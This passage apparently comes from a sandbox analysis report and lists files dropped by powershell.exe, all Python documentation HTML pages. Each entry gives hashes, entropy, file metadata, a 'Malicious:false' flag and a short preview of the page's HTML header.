                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="asyncio . Asynchronous I/O" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/asyncio.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Hello World!: asyncio is a library to write concurrent code using the async/await syntax. asyncio is used as a foundation for multiple Python asynchronous frameworks that provide high-performance n..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Hello World!: asyncio is a library to write concurre
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (730), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27790
                                                                                                                                                                                                              Entropy (8bit):4.838156742411584
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:fqyoCjMGQpQROOwHo1DLs9OmuR/psY0prHMY762/:fqyHMGQpQROOwHo1DLs9OLR/px05MY7Z
                                                                                                                                                                                                              MD5:8D479909E153130D70F7FA2C1B5F33F4
                                                                                                                                                                                                              SHA1:02C317FFB4B7B995161FE420979FED5CF68DE909
                                                                                                                                                                                                              SHA-256:724BA1ED4D51760EEDE6D70366CF5D3095BA6739BFF15E057307A84B3488FF19
                                                                                                                                                                                                              SHA-512:19322499156050862EC3BB8B891F6C65C723C9FCF695AD86FD62A1C2FBF6F3825FC2DB01BDBD23CC4FFFC323129D41C8D2F54BA1CBA0AB011086685902ABDA41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="atexit . Exit handlers" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/atexit.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The atexit module defines functions to register and unregister cleanup functions. Functions thus registered are automatically executed upon normal interpreter termination. atexit runs these functio..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The atexit module defines functions to register and unreg
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1093), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):50049
                                                                                                                                                                                                              Entropy (8bit):4.786063905945728
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:FqyeMBaWjALqVrs5xv4hZvqhYb8vkv8vKf8v0K8v6h+8vaj8vCn86ud86YM8HrNz:zaWjALP+7oA
                                                                                                                                                                                                              MD5:9625023C877162979296C5A73CAA31ED
                                                                                                                                                                                                              SHA1:F92CFBF65D679F7039FA7B464E1C0473A629252D
                                                                                                                                                                                                              SHA-256:A912D660534083AA81131636E2FE58220CB30434C689E08E780C56E5DFCBE41C
                                                                                                                                                                                                              SHA-512:E88EBA55712C2A2F5149F293C635A7DA8996BA9A7B3BF5BD7095861AA067E95A326F5E6676B728766DBEC65F853DEC511106743CC784CB85B47B7E64C303411D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="audioop . Manipulate raw audio data" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/audioop.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The audioop module contains some useful operations on sound fragments. It operates on sound fragments consisting of signed integer samples 8, 16, 24 or 32 bits wide, stored in bytes-like objects. A..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The audioop module contains some useful ope
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (781), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):79336
                                                                                                                                                                                                              Entropy (8bit):4.770239705882168
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ibrxHqklWhMbVnwTMP7Mz6t5ui5SBCWQxKM5eegSZo1M2GfRQ4vSHLUy/hBb7nGf:EBqyWhoV+MP798jAja4sfhF7sMo762/
                                                                                                                                                                                                              MD5:2B9EDE73ACD80725B4518AAD4562051F
                                                                                                                                                                                                              SHA1:0AED4763D704B36023B1C0B8E6FC417D6FECD343
                                                                                                                                                                                                              SHA-256:1FDD88461170FC9E46BD86D0DF62FFD89A154135AB8E68505CB445BB8328D114
                                                                                                                                                                                                              SHA-512:969B252B12BF98B7AE46046C2C935C09C547F708965BCA0E88DB0EE9996A87CB87D8071DFD97B23201D66737A5B0BE31DEC07537CF832A23D3F633101B0259E6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Audit events table" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/audit_events.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This table contains all events raised by sys.audit() or PySys_Audit() calls throughout the CPython runtime and the standard library. These calls were added in 3.8.0 or later (see PEP 578). See sys...." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This table contains all events raised by sys.audit() or P
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1244), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52598
                                                                                                                                                                                                              Entropy (8bit):4.890512675264744
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:/qyPMoIcQItpXPyFGOLTVXPyF9yYDji3jXrarXPPg2XSleXOPLuXn9mXwyYCyFK8:ScQI/OLAjifsPadPqGecO4DMIC6KrM6B
                                                                                                                                                                                                              MD5:5D18292EEC6D7ABB3D835084E36869BA
                                                                                                                                                                                                              SHA1:F363E42C0A85E70E8C3FFC6EAC2701B08014008B
                                                                                                                                                                                                              SHA-256:39B31DAF9A3B68676BEC61554AB891A2904518A225BE0B6D09751D5CEE752ED2
                                                                                                                                                                                                              SHA-512:91A50F3985F6AC8992F21A794FDF1E43595741E2FC676AE4FA1DF49E466CFAF201B9FBF5CF524CAB89AE38A17D9DA33BF5775F79FE5274AF3064D363DA6EE4C4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="base64 . Base16, Base32, Base64, Base85 Data Encodings" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/base64.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/base64.py This module provides functions for encoding binary data to printable ASCII characters and decoding such encodings back to binary data. It provides encoding and decoding f..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/base64.p
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1214), with CRLF, CR line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):70575
                                                                                                                                                                                                              Entropy (8bit):4.834638023070761
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Fqy3MDX0pYulR8yYPyFiyFWRXx5ZLuyFLaoLcnCxThhrPyFjVWiTvT+TnTThTTFV:EcJ5Hd2dtYqr6vA
                                                                                                                                                                                                              MD5:81784EB90E90B7CB3E280FD8E4E4C3B7
                                                                                                                                                                                                              SHA1:45E972C5C15ED23D82C7169BD503FEB24D2D94F1
                                                                                                                                                                                                              SHA-256:FF43AD1968BBC092709C6BB243B6624900B887F12C2DC7DAF8B31C351B536729
                                                                                                                                                                                                              SHA-512:B547979189BFE184EE5F6E5109F0D0ABCCF501AA9C16C549C5120940449BDB2923B77ADAFD76437E4A9BA55BCD6EAD772422B3508B85DF6CCD4698D2CEE22442
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="bdb . Debugger framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/bdb.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/bdb.py The bdb module handles basic debugger functions, like setting breakpoints or managing execution via the debugger. The following exception is defined: The bdb module also def..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/bdb.py The bdb module handles basic debug
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19170
                                                                                                                                                                                                              Entropy (8bit):4.86937495725831
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:IS3jjHqklhnovjnXnTMeJmp/6JKcSZntv1nXDTM/76zqWTC:IS3jDqyhnEjXTMeJmd6kLn51X3M/762/
                                                                                                                                                                                                              MD5:AEF7595E0E6779D19837AAEEF10CBA18
                                                                                                                                                                                                              SHA1:7D369033B762CF9DAA7C2FE0CEC6D6244A8167C8
                                                                                                                                                                                                              SHA-256:59461AE4AB0CBCF6A4009AB8AA980526EDD8C516D3EF1B662566046EE69D73D8
                                                                                                                                                                                                              SHA-512:C60CB29DA3C89EE0AFE6490AAC676A8C1208533FC5CDB77D9A76D59F78BBAE0CAC0C76E1E4CEEF3D6D887AD9300041AA51E3DBADB196A6FCDF4EABDD6C4EA95B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Binary Data Services" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/binary.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter provide some basic services operations for manipulation of binary data. Other operations on binary data, specifically in relation to file formats and network p..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter provide some basic serv
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (975), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36777
                                                                                                                                                                                                              Entropy (8bit):4.907331904948137
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pvqyfdV3MMERtYdkw5yYBgt/wayYsL0kwfyTgYvOk+yYWKkbyYYyT+yYFzHkOaET:pvqy1NMMERtYdkw5yYBgt/wayYM0kwfD
                                                                                                                                                                                                              MD5:526AA1BDD1BBE5D8B2BA84C7CDF26C3E
                                                                                                                                                                                                              SHA1:A7EF5195598FBBF1ECCCD7643B8262E9DE53D293
                                                                                                                                                                                                              SHA-256:FDA71460F1B92B13D11EAB370694CE85E5E09D7D366E161C1D3CB8C072E4F259
                                                                                                                                                                                                              SHA-512:7938234FEF5A93C0C1C398C55487DFF627B43EB1ACC7D4A17FDA64D11FF6AE48D001A8DF36177ADF928BBA673103B685332D77E19437CE3956F0CC558C490E1E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="binascii . Convert between binary and ASCII" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/binascii.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The binascii module contains a number of methods to convert between binary and various ASCII-encoded binary representations. Normally, you will not use these functions directly but use wrapper modu..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The binascii module contains a num
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1119), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):47170
                                                                                                                                                                                                              Entropy (8bit):4.8085870340214285
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:QqylDwM/MBxfiyL4ykwMyFXpiyUYxfiyL4ykwMyFHJxfiyL4ykwMyFfixfiyL4yC:QqymM/MBxfiyL4ykwMyF5iyUYxfiyL4y
                                                                                                                                                                                                              MD5:5475CC06C05427DCFB2DC5E1EA86E114
                                                                                                                                                                                                              SHA1:2019E5B63F2132B2FC38A10044F82B272F4131C7
                                                                                                                                                                                                              SHA-256:2C7D264F328ABFDA67FC7681277177EB0450C50B3DA1DA35C48697F63EC69952
                                                                                                                                                                                                              SHA-512:BCF4D98F088FAF0F428A9AAFEEF68CD067F58B611E8209D9B451592A0B29EDE9BF7777776824954FAF6EEB015E1ACAA8CF2B5C84DFD3B5F80663714D693366FC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="bisect . Array bisection algorithm" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/bisect.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/bisect.py This module provides support for maintaining a list in sorted order without having to sort the list after each insertion. For long lists of items with expensive compariso..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/bisect.py This module provid
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (432), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18061
                                                                                                                                                                                                              Entropy (8bit):4.865644898615805
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:k0HqklxZJ+nyZTM51DWvEBpPZUanyNTM+76zqWTC:pqyfcGMLsEBP/0M+762/
                                                                                                                                                                                                              MD5:F73A6B16DF8FBA5FCE975CCE5DAECDBC
                                                                                                                                                                                                              SHA1:7B1FF63918C0E68BC476995B55CA7B4293D4AD46
                                                                                                                                                                                                              SHA-256:728E829178842B227728A99841CAB5168ACBAF1535B74DC3511A152D5F0E1263
                                                                                                                                                                                                              SHA-512:C095A58F3070C571406BC69177BAE09C5D318DE98C3D1F96F6B2E97C693F2785BCA1B35E20A29C4D155D73733D6D46FAB81CD614B35EE1621DAD4A25124CA71B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="builtins . Built-in objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/builtins.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module provides direct access to all .built-in. identifiers of Python; for example, builtins.open is the full name for the built-in function open(). See Built-in Functions and Built-in Constan..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module provides direct access to all .b
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1357), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57965
                                                                                                                                                                                                              Entropy (8bit):4.88287162957664
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:YqyZMx7LVMy1Ry4WyF4yFfyFe3RDVMyVwRy4naTGwXSjhyZnsDunoMy4IkizebtC:P3y7uYz4dnc0A
                                                                                                                                                                                                              MD5:A8F4081470E1ADB3F86B5D22C556D499
                                                                                                                                                                                                              SHA1:982E00E344F450404A78462E25FAA216E97962B7
                                                                                                                                                                                                              SHA-256:284A6AEE2FAE68FAB42ABE02BF468D52EFBBE5C6426E2BB926CB01CFF36524BE
                                                                                                                                                                                                              SHA-512:D7640D5430FDA4AFD9E769D11071CCA3EBA09A05AFBBAA7D8573669E5ED3B2A07DE688EFEAA26C61127C9A74F478664018ADFE3B53FD002125297CF421A4BACE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="bz2 . Support for bzip2 compression" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/bz2.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/bz2.py This module provides a comprehensive interface for compressing and decompressing data using the bzip2 compression algorithm. The bz2 module contains: The open() function and..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/bz2.py This module provides a
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1138), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):98083
                                                                                                                                                                                                              Entropy (8bit):4.839991411340195
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:GqyBM3UkV4yLJ1B1hB1oB1IB1XB1tB1lB1oB1MBvyqnBvyqDBvyq2m4yLG8sSyLe:lE2NidnHA
                                                                                                                                                                                                              MD5:9D4DB16C9D5795001E2C8D07BBDB3D0F
                                                                                                                                                                                                              SHA1:162A61CAF82EBEAF6795762DA408851F67E49231
                                                                                                                                                                                                              SHA-256:D5FF85A39C2D7CA945B04A4DB09C774603DB3DAFA5DEE9B7918ECD4A9FF91310
                                                                                                                                                                                                              SHA-512:F763D041F9CE7D75B469A6E4E66280794177131FAF68A319EB2B43A66B7FCAD5E33F9ACE81C3806A7529FFDA91D2B10C9DD8B671669F795730DEE3F0DC854C1E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="calendar . General calendar-related functions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/calendar.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/calendar.py This module allows you to output calendars like the Unix cal program, and provides additional useful functions related to the calendar. By default, these calendars have..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/calendar.py Thi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1299), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):71812
                                                                                                                                                                                                              Entropy (8bit):4.863021785594034
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:uqyEMoW1U1VG0fjf/LrPOdbSyFVbbWvYCyF+y2syYVyYIy83LCLWyb4y3Iy82dyO:4OJ/ZA
                                                                                                                                                                                                              MD5:59B2E6D8399C8BEAD168FB5EB53026B5
                                                                                                                                                                                                              SHA1:92E4149E97A07149A9701E95A444B1BDC1FFD350
                                                                                                                                                                                                              SHA-256:C12CA53CE879DEC3B20DD03AB900FDCBFBE1BA9A675FDE119D9C59811B167ACC
                                                                                                                                                                                                              SHA-512:4A63E229FF94B0D6EC484315B3FC72B052FA5A3B18EC0BBEB8D2D32CE82101ACB1E22E4F7E8288E4ECBE28C8655C9D02670D05C2714A4DEDBF212ECEAE646656
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="cgi . Common Gateway Interface support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/cgi.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/cgi.py Support module for Common Gateway Interface (CGI) scripts. This module defines a number of utilities for use by CGI scripts written in Python. The global variable maxlen can..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/cgi.py Support module for C
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1077), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):23299
                                                                                                                                                                                                              Entropy (8bit):4.86880915551537
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:teQHqklZg1nFTMnsbKO/muKksyQiyFwykkyWjJfM0cMwyk8oSMwykoDrMyF+1bni:tqyZcBMsbOuKksyQiyFwykkyWh7cMwyg
                                                                                                                                                                                                              MD5:21910E851AE98977FEFB43E31FADF507
                                                                                                                                                                                                              SHA1:7F5B45F7C2889BBE833EBB63D952D0BF5A7E26D1
                                                                                                                                                                                                              SHA-256:2DB02E8154CD9B9D176EE904C24A15A2C492EEA35924CB59D2CF7AEE4D77758B
                                                                                                                                                                                                              SHA-512:C2D115ECF6320821EC9FD970C27FC5BDA69B6368747929F835F4891864AECF483358ED93448CE7CF0938E9A9AEEB090522D1CD019AAD80E84C7E9E2A02883718
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="cgitb . Traceback manager for CGI scripts" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/cgitb.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/cgitb.py The cgitb module provides a special exception handler for Python scripts. (Its name is a bit misleading. It was originally designed to display extensive traceback informat..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/cgitb.py The cgitb mod
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1049), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25697
                                                                                                                                                                                                              Entropy (8bit):4.912457377920181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:Dqy109MooctgaaWyT6yTuyYm8hpY6o7yLbehyZte37pM3762/:DqyYMoNgaaWyT6yTuyYLhpY6o7yLbehQ
                                                                                                                                                                                                              MD5:37F7A6E1A548A19D84F6947469CBE545
                                                                                                                                                                                                              SHA1:FDEB776716872C0A20722DCFC0DBBB89854490AD
                                                                                                                                                                                                              SHA-256:BE38A95FE02538F323C73B0646C09058DF7955F49642C2AFB7BA0B80B8E4B442
                                                                                                                                                                                                              SHA-512:330734AF3103535C78BE21AA70096FCCE3E6DA532C1A6F5858744432006CCF424BEF2A2680BDF260867FF3AE68F4B63E177AA23B4FC7839CB3B175A8829FC291
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="chunk . Read IFF chunked data" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/chunk.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/chunk.py This module provides an interface for reading files that use EA IFF 85 chunks. 1 This format is used in at least the Audio Interchange File Format (AIFF/AIFF-C) and the Re..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/chunk.py This module provides an i
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (925), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):48187
                                                                                                                                                                                                              Entropy (8bit):4.843933459747485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:Y+50HJqyTOmPY4Mv4K9fmzJYMHcOWqTLO9BcMzioOj5OpzNkO/5OqROI0OY1OzYp:OqyfMVmVYOcOWkLO9BcMzioOj5OpzNkB
                                                                                                                                                                                                              MD5:87FD440AC813A9C8DD9D80684C94DC1C
                                                                                                                                                                                                              SHA1:867756DDFC04C21F85139C37557099F79B0B7690
                                                                                                                                                                                                              SHA-256:91A18A287FA218A453A66A4AFFA95D274BB51694FC3BC3D936CA79F1ED3AF6FB
                                                                                                                                                                                                              SHA-512:A769201A22F34E332360B52DC44F4F7766F08CE3472B3D6C3C16B34A3EDD888E8195A5252B9BBFF3E17A233A058BB2CE06902EB7D43797A22ED0FA54270730A1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="cmath . Mathematical functions for complex numbers" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/cmath.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module provides access to mathematical functions for complex numbers. The functions in this module accept integers, floating-point numbers or complex numbers as arguments. They will also accep..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module provides access to
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (958), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):56394
                                                                                                                                                                                                              Entropy (8bit):4.832214447037617
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:8qPQqyxdNMeUZb4yyxyFYyFsZAyFxuWVTNAIciOlbTRa/ujAFynMEORFUR1c77w7:8qPQdo7IvRXwOFA
                                                                                                                                                                                                              MD5:5CCD800FA470AEBCDF06E2EFC6D42EDB
